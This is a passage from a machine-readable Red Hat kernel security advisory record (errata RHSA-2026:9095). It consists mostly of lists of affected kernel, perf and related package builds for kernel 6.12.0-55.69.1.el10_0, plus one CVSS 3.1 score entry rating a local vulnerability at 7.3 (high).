"RT-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.x86_64"
],
"restart_required": {
"category": "machine"
},
"url": "https://access.redhat.com/errata/RHSA-2026:9095"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:H",
"version": "3.1"
},
"products": [
"AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.src",
"AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch",
"AppStream-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-doc-0:6.12.0-55.69.1.el10_0.noarch",
"AppStream-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.src",
"BaseOS-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch",
"BaseOS-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
